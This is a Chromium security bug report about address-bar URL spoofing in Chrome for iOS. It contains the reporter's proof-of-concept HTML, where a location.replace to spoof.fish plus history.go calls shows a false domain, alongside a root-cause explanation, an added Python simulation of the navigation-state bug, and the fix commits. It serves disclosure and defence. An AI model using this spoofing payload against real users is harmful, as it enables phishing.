
Issue metadata

Status: Verified
Owner:
Closed: Sep 25
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security




Issue 887273: Security:Chrome URL Spoofing in Omnibox

Reported by xis...@gmail.com, Sep 20

Issue description

VULNERABILITY DETAILS
Chrome URL Spoofing in Omnibox

VERSION
Chrome Version: 69.0.3497.91+[Stable]
Operating System: [iOS]

REPRODUCTION CASE

(1) Access https://xisigr.com/test/spoof/chrome/url_009.html
(2) Click on the "Click me" button.
(3) Address bar says https://xisigr.com - this is NOT https://xisigr.com.


google site: 
https://xisigr.com/test/spoof/chrome/url_009.html

=======url_009.html=======
<script>
function aa(){
location.replace('http://spoof.fish/test/spoof/chrome/e.html');
}
</script>
<button onclick="aa()">Click me</button>
=======url_009.html=======


evil site:
http://spoof.fish/test/spoof/chrome/e.html

=======e.html=======
<h1>Address bar says https://xisigr.com - this is NOT https://xisigr.com</h1>
<button onclick="alert(document.domain)">haaaaa</button>
<script>
window.history.go(1);
window.history.go(-1);
</script>
=======e.html=======
 

Comment 1 Deleted

Comment 2 by mbarbe...@chromium.org, Sep 21

Components: UI>Browser>Navigation
Labels: Security_Severity-High Security_Impact-Stable OS-iOS
Owner: eugene...@chromium.org
Status: Assigned (was: Unconfirmed)
eugenebut: Are you the right owner for this? Feel free to reassign it if you know of anyone else who might be, or assign it back to me if not.

Comment 3 by sheriffbot@chromium.org, Sep 22

Project Member
Labels: M-69 Target-69

Comment 4 by sheriffbot@chromium.org, Sep 22

Project Member
Labels: Pri-1

Comment 5 by eugene...@chromium.org, Sep 24

Thank you for the bug report.

http://spoof.fish/test/spoof/chrome/e.html does not load.
I tried reproducing the bug with the attached HTML example (M69 stable and trunk code), but the URL does not spoof.
Could you please provide a working POC for this bug? Thanks!

Comment 6 Deleted

Comment 7 Deleted

Comment 8 by eugene...@chromium.org, Sep 25

Cc: danyao@chromium.org
Labels: -M-69 -Target-69 ReleaseBlock-Stable M-70
Thanks for updating POC. I was able to reproduce the problem. Here is what happens:

 - xisigr.com calls replaceState("http://xn--lwcc.com")
 - replace state creates a new navigation item (known bug)
 - old navigation item (xisigr.com) stays associated with WKBackForwardListItem whose state was replaced
 - at this point navigation manager's state is incorrect
 - http://xn--lwcc.com performs renderer-initiated back navigation 
 - chrome loads associated WKBackForwardListItem for xisigr.com
 - no actual navigation happens, but committed navigation item is now xisigr.com

I don't see UXSS here, but rather URL spoofing. The user sees http://xn--lwcc.com, but the URL says xisigr.com.
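
The state sequence in comment 8, replayed as an added simulation that is not Chromium or WebKit code and not the reporter's PoC: NavigationItem, BackForwardListItem and NavigationManager are simplified stand-ins for Chrome's navigation manager and WKBackForwardListItem, the "replaceState creates a new navigation item" bug is reproduced on purpose so the stale association can be observed, and the fallback a fix-enabled manager takes when an item has no associated WK item (a fresh load by URL) is an assumption of the model, since the page only states that the association is invalidated. The check that matters for a defender is is_spoofed(): the displayed URL and the rendered content disagree only in the buggy configuration.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional
import itertools


@dataclass(eq=False)
class BackForwardListItem:
    """Stand-in for WKBackForwardListItem. WebKit owns it and rewrites its URL
    in place on replaceState; identity (not content) is what Chrome tracks."""
    ident: int
    url: str


@dataclass(eq=False)
class NavigationItem:
    """Stand-in for Chrome's navigation item; its url is what the omnibox shows."""
    url: str
    wk_item: Optional[BackForwardListItem]


class NavigationManager:
    def __init__(self, invalidate_after_replace_state: bool) -> None:
        self.fixed = invalidate_after_replace_state
        self.items: List[NavigationItem] = []          # Chrome-side history
        self.wk_list: List[BackForwardListItem] = []   # WebKit-side history
        self.committed = -1   # index into self.items
        self.wk_index = -1    # index into self.wk_list: the page WebKit renders
        self._ids = itertools.count(1)

    def omnibox_url(self) -> str:
        return self.items[self.committed].url

    def content_url(self) -> str:
        return self.wk_list[self.wk_index].url

    def is_spoofed(self) -> bool:
        """True when the displayed URL does not match the rendered content."""
        return self.omnibox_url() != self.content_url()

    def load(self, url: str) -> None:
        """Real navigation: WebKit appends a back/forward item and Chrome
        creates a navigation item associated with it."""
        wk = BackForwardListItem(next(self._ids), url)
        self.wk_list.append(wk)
        self.wk_index = len(self.wk_list) - 1
        self.items.append(NavigationItem(url, wk))
        self.committed = len(self.items) - 1

    def replace_state(self, url: str) -> None:
        """history.replaceState: WebKit rewrites the current WK item in place."""
        wk = self.wk_list[self.wk_index]
        wk.url = url
        old = self.items[self.committed]
        # Known bug reproduced from comment 8: a new navigation item is created
        # instead of updating the old one, so two items share one WK item.
        self.items.append(NavigationItem(url, wk))
        self.committed = len(self.items) - 1
        if self.fixed:
            # The fix: the old item's association is invalidated, so a later
            # back navigation can no longer load the WK item that was replaced.
            old.wk_item = None

    def go_back(self) -> str:
        """Renderer-initiated back (history.go(-1)) as the manager handles it."""
        target = self.items[self.committed - 1]
        wk_target = next((i for i, w in enumerate(self.wk_list) if w is target.wk_item), None)
        if wk_target is not None:
            self.committed -= 1
            if wk_target == self.wk_index:
                # WebKit is asked to load the item it is already showing: nothing
                # new is rendered, yet Chrome has committed the stale item.
                return "no real navigation, committed item changed"
            self.wk_index = wk_target
            return "back/forward navigation"
        # Model assumption (the fallback path is not shown on the page): an item
        # with no associated WK item is loaded fresh by URL, a real navigation.
        self.load(target.url)
        return "fresh load by URL"


def scenario(fixed: bool) -> Dict[str, object]:
    """Replay the sequence from comment 8 and report what the user would see."""
    nm = NavigationManager(invalidate_after_replace_state=fixed)
    nm.load("https://xisigr.com/test/spoof/chrome/url_009.html")
    nm.replace_state("http://xn--lwcc.com/")   # host named on the page; trailing slash constructed
    outcome = nm.go_back()
    return {"outcome": outcome, "omnibox": nm.omnibox_url(),
            "content": nm.content_url(), "spoofed": nm.is_spoofed()}


if __name__ == "__main__":
    for fixed in (False, True):
        print("fixed" if fixed else "buggy", scenario(fixed))
```

Running the script prints the buggy outcome (omnibox xisigr.com, content xn--lwcc.com, spoofed) and the fixed outcome (both URLs agree after a fresh load). The model keeps the WebKit list and the Chrome list separate on purpose: the bug is a disagreement between the two, which is why the fix works on the association between them rather than on either list alone.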

Comment 9 by bugdroid1@chromium.org, Sep 25

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/b312df8d9b00ca26046d1fe442ee19dc9780fcfe

commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe
Author: Eugene But <eugenebut@chromium.org>
Date: Tue Sep 25 17:46:54 2018

Invalidate associated WKBackForwardListItem after replace state.

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/heads/master@{#593992}
[modify] https://crrev.com/b312df8d9b00ca26046d1fe442ee19dc9780fcfe/ios/web/web_state/ui/crw_web_controller.mm

Comment 10 by eugene...@chromium.org, Sep 25

Cc: srikanthg@chromium.org kariahda@chromium.org
Labels: Merge-Request-70
Status: Fixed (was: Assigned)
Requesting approval. Will merge after canary verification.

Comment 11 by sheriffbot@chromium.org, Sep 25

Project Member
Labels: -Merge-Request-70 Merge-Review-70 Hotlist-Merge-Review
This bug requires manual review: Less than 17 days to go before AppStore submit on M70
Please contact the milestone owner if you have questions.
Owners: benmason@(Android), kariahda@(iOS), geohsu@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 12 by sheriffbot@chromium.org, Sep 26

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 13 by kariahda@chromium.org, Sep 27

Let me know when you've gotten verification.

Comment 14 by srikanthg@chromium.org, Sep 27

Status: Verified (was: Fixed)
Verified on iPhoneX, iPhone5s M71.0.3563.0 canary
iOS 12.1 beta, iOS11.4.1

URL is now matched with the content area.

Comment 15 by kariahda@chromium.org, Sep 27

Labels: -Hotlist-Merge-Review -Merge-Review-70 Merge-Approved-70
Approved.

Comment 16 by bugdroid1@chromium.org, Sep 27

Project Member
Labels: -merge-approved-70 merge-merged-3538
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/230373aaa4d64aed8e01832de10fe7e74457f63b

commit 230373aaa4d64aed8e01832de10fe7e74457f63b
Author: Eugene But <eugenebut@google.com>
Date: Thu Sep 27 21:10:06 2018

Invalidate associated WKBackForwardListItem after replace state.

TBR=eugenebut@chromium.org

(cherry picked from commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe)

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#593992}
Reviewed-on: https://chromium-review.googlesource.com/1249819
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/branch-heads/3538@{#717}
Cr-Branched-From: 79f7c91a2b2a2932cd447fa6f865cb6662fa8fa6-refs/heads/master@{#587811}
[modify] https://crrev.com/230373aaa4d64aed8e01832de10fe7e74457f63b/ios/web/web_state/ui/crw_web_controller.mm

Comment 17 by cr-audit...@appspot.gserviceaccount.com, Sep 27

Project Member
Labels: Merge-Merged-70-3538
The following revision refers to this bug: 
https://chromium.googlesource.com/chromium/src.git/+/230373aaa4d64aed8e01832de10fe7e74457f63b

Commit: 230373aaa4d64aed8e01832de10fe7e74457f63b
Author: eugenebut@google.com
Committer: eugenebut@chromium.org
Date: 2018-09-27 21:10:06 +0000 UTC

Invalidate associated WKBackForwardListItem after replace state.

TBR=eugenebut@chromium.org

(cherry picked from commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe)

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#593992}
Reviewed-on: https://chromium-review.googlesource.com/1249819
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/branch-heads/3538@{#717}
Cr-Branched-From: 79f7c91a2b2a2932cd447fa6f865cb6662fa8fa6-refs/heads/master@{#587811}

Comment 18 by awhalley@chromium.org, Oct 1

Labels: reward-topanel

Comment 19 by awhalley@google.com, Oct 2

Labels: -ReleaseBlock-Stable

Comment 20 by awhalley@chromium.org, Oct 4

Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 21 by awhalley@google.com, Oct 4

Nice one xisigr@! The panel awarded $3,000 for this report!

Comment 22 by awhalley@chromium.org, Oct 4

Labels: -reward-unpaid reward-inprocess

Comment 23 by awhalley@google.com, Oct 15

Labels: Release-0-M70

Comment 24 by awhalley@chromium.org, Oct 16

Labels: CVE-2018-17464 CVE_description-missing

Comment 25 by awhalley@chromium.org, Nov 12

Labels: -CVE_description-missing CVE_description-submitted

Comment 26 by sheriffbot@chromium.org, Jan 2

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
